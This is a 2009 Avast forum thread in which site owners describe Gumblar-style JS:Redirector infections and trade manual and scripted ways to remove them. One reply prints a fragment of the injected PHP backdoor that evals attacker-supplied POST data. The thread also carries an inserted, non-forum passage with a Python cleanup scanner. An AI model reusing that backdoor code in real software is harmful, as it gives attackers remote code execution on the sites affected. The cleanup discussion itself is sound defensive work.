Author Topic: JS-Redirector-G [trj] warning  (Read 25547 times)


azgirl

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #15 on: May 01, 2009, 01:32:17 AM »
I've done some experimenting and have found the simplest solution, at least for me.

First I looked on the server for infected files.  I use WS_FTP.  Clicked on a few files on the server, asked to "view" them (in Notepad).  Any infected ones trigger Avast.  Some files are infected, some are not.  No rhyme or reason as to which are or are not.

Then I did the same for the ones on my computer, "viewed" in WS_FTP.  I presume you can do these operations in other FTP programs; I haven't used any others.  I re-uploaded the ones that were not infected.

Later I found that it's easier to check with Avast by right-clicking in the directory on my computer, instead of having all those Notepad windows open!

Now comes the tricky part.  Do I go back to a "backup" file or try to repair the html?  My concern was that my 'backup' files would not have my very latest changes.

So here's what I'm doing:  I simply open the infected file in my editor (I use Komposer), go to the Source Code, find that line of code (search for unescape) and delete the entire 3 lines, <script to script>.  The code is in the same place every time, right at the end of the /head section.  Makes it easy to find over and over!

After I save, I double-check in the folder on my computer by right-clicking the file name to let Avast do its thing.  Clean!

This way, everything on my page is preserved and the baddie is gone.  It's time-consuming, boring, but well worth it.

I hope these details will help.

BTW, has anyone figured out where all this 'redirection' is supposed to take us?

« Last Edit: May 01, 2009, 02:25:21 AM by azgirl »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89061
  • No support PMs thanks
Re: JS-Redirector-G [trj] warning
« Reply #16 on: May 01, 2009, 02:44:18 AM »
I don't believe it really matters where it takes you as one malicious site is much the same as the next and even if you knew where it went, you wouldn't know what the payload would be at that end.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

azgirl

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #17 on: May 01, 2009, 04:15:27 AM »
...you wouldn't know what the payload would be at that end.

YIKES!  Very true.  Hadn't thought about that.  Thanks.

Offline DavidR

Re: JS-Redirector-G [trj] warning
« Reply #18 on: May 01, 2009, 04:01:48 PM »
You're welcome.

VoniBear

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #19 on: May 01, 2009, 04:11:19 PM »
File Name:                      hxxp://www.cybermedsites.com/
Malware name:                JS:Redirector-H [trj]
Malware type:                 Trojan Horse
VPS version:                    090430-0, 04/30/2009

I use a site called Cybermedsites.com to host my web site. Today, when I attempted to access my site via the administration page through Cybermedsites, Avast detected the above. I've already notified the owners of Cybermedsites, but am wondering if anyone can determine if it is a valid infection?

Also, I am able to access my own web site URL directly without Avast detecting anything. Does this mean it is safe for others to peruse my site, or should I be concerned?

Offline DavidR

Re: JS-Redirector-G [trj] warning
« Reply #20 on: May 01, 2009, 04:50:10 PM »
The site has been hacked (that URL you gave), there is a bunch of obfuscated javascript (on a single line) just before the opening Body tag, see image. I have modified the script, broken down the single line, to make it easier to see in the image.

simplyme2

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #21 on: May 02, 2009, 08:40:03 AM »
I too received this warning this morning from the website myfamilykitchen.com.  It was redirecting to something called gumblar.cn?

Thanks

CharleyO

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #22 on: May 02, 2009, 09:43:42 AM »

itzhak

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #23 on: May 04, 2009, 06:27:23 AM »
Hi!

Cutting this
Code:
document.write(unescape('encrypted script tag').replace(random char sequences)
from *.htm and *.html files is not enough if you use PHP.

I had to find the PHP code which generated this script. In my case it was something like this:

Code:
if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('encrypted script tag($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);

AND 10 lines of code...



Avast doesn't consider *.php files with this script infected; I used UltraEdit for finding and cutting (65 *.html files and 157 *.php files).
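The manual find-and-cut described in this post can be driven by a small scanner. The Python below is an added example, not code from this thread or from Avast: it walks a site tree, flags .htm/.html/.php files that carry either the document.write(unescape(...)) script block or the tmp_lkojfghx / eval($_POST[...]) PHP stub markers quoted above, and on request strips the HTML block after saving a .bak copy. The regexes are my assumptions about the injection's shape, and the sample HTML with its placeholder payload is constructed for the test.

```python
import os
import re
import shutil

# Assumed shape of the injected block the thread describes: a short <script>,
# usually wrapped in an HTML comment, whose body is document.write(unescape(...)).
JS_INJECT = re.compile(
    r"<script[^>]*>\s*(?:<!--)?\s*document\.write\(unescape\(.*?</script>[ \t]*\r?\n?",
    re.IGNORECASE | re.DOTALL)

# Markers of the PHP stub quoted in the thread. Its full extent is not shown,
# so PHP files are only reported, never rewritten automatically.
PHP_MARKERS = (re.compile(r"function_exists\('tmp_lkojfghx'\)"),
               re.compile(r"eval\(\$_POST\["))

# Constructed sample with a harmless placeholder payload (not a real injection).
SAMPLE_HTML = ("<html><head><title>t</title>\n<script language=javascript><!-- \n"
               "document.write(unescape('%3C%21--%20placeholder%20--%3E').replace(/zz/g,''));\n"
               " --></script>\n</head><body>hello</body></html>\n")

def scan_text(text):
    """Findings for one file: count of injected JS blocks, PHP stub present?"""
    return {"js_redirect": len(JS_INJECT.findall(text)),
            "php_stub": any(m.search(text) for m in PHP_MARKERS)}

def clean_html(text):
    """Strip injected script blocks; returns (cleaned_text, blocks_removed)."""
    return JS_INJECT.subn("", text)

def scan_tree(root, fix=False):
    """Walk root and report infected files; with fix=True, rewrite HTML files
    after saving a .bak copy. PHP files are report-only (manual review)."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".htm", ".html", ".php")):
                continue
            path = os.path.join(dirpath, name)
            # latin-1 round-trips any byte sequence; newline='' keeps CRLF intact.
            with open(path, encoding="latin-1", newline="") as fh:
                text = fh.read()
            found = scan_text(text)
            if not (found["js_redirect"] or found["php_stub"]):
                continue
            if fix and found["js_redirect"] and not path.lower().endswith(".php"):
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="latin-1", newline="") as fh:
                    fh.write(clean_html(text)[0])
                found["fixed"] = True
            report.append((path, found))
    return report
```

Diff each .bak against the rewritten file before deleting the backups, and treat a flagged PHP file as a sign that the server-side stub that regenerates the script, not just its output, has to be removed.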



Offline DavidR

Re: JS-Redirector-G [trj] warning
« Reply #24 on: May 04, 2009, 04:02:49 PM »
Please exercise extreme care when posting code, or avast could possibly detect it in these pages and alert; this is why I post images of the code.

I know you are using it as an example but avast could still alert.

shahja

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #25 on: May 17, 2009, 06:04:16 PM »
Hi,

Any luck on removing this type of virus from all hacked files with a script, as opposed to manually checking each file?

I have over 200 main folders, and each has many sub-folders under it. I need a script to remove this type of virus automatically, as if I had to do this manually one at a time it would take me over 2-3 months. Please advise. I have a copy of it on the server and the same exact copy on my local hard drive. In total it is over 10 gig of files. So an easier way would be some type of script/code to remove the virus.
Please reply to my yahoo email as well.
Thanks & Regards

Jigar
(shahja99@yahoo.com)



Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33902
  • malware fighter
Re: JS-Redirector-G [trj] warning
« Reply #26 on: May 17, 2009, 06:34:21 PM »
Hi malware fighters,

You all can read about the gumblar redirects here:
http://forum.avast.com/index.php?topic=45296.0

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

jonbey

  • Guest
Re: JS-Redirector-G [trj] warning
« Reply #27 on: May 19, 2009, 04:40:15 PM »
Hi, I have been caught up in this drupal / gumblar mess too. Rolling the server back.
I have uploaded fresh files but worried that the database may not be clean. Was using an older version of drupal too. Hopefully a rollback, upgrade and password change (ftp and drupal) will do the trick.

 

Offline polonus

Re: JS-Redirector-G [trj] warning
« Reply #28 on: May 15, 2015, 11:14:51 PM »
Update - JS:Redirector-GB [Trj] returning here:
This is a suspicious page
Result for  2015-05-15 20:52:14 UTC
Website: htxp://aguasomos.org
Checked URL: htxp://aguasomos.org/index.php?id=6609&option=com_k2&task=user&view=itemlis ...
Trojans detected:
Object: http://aguasomos.org/index.php?id=6609&option=com_k2&task=user&view=itemlist
SHA1: 4235c3fe1201d0e1ff45aa72928c1cd0ba03ce79
Name: TrojWare.JS.Agent.jg
Bitdefender TrafficLight blocks site.
Outdated Joomla Found   Security Announcements   Joomla under 2.5.26 or 3.3.5
The threat is in "media/system/js/mootools.js" & in "media/system/js/caption.js"  (blacole)

IP badness history: https://www.virustotal.com/nl/ip-address/50.63.33.1/information/

polonus
« Last Edit: May 15, 2015, 11:21:56 PM by polonus »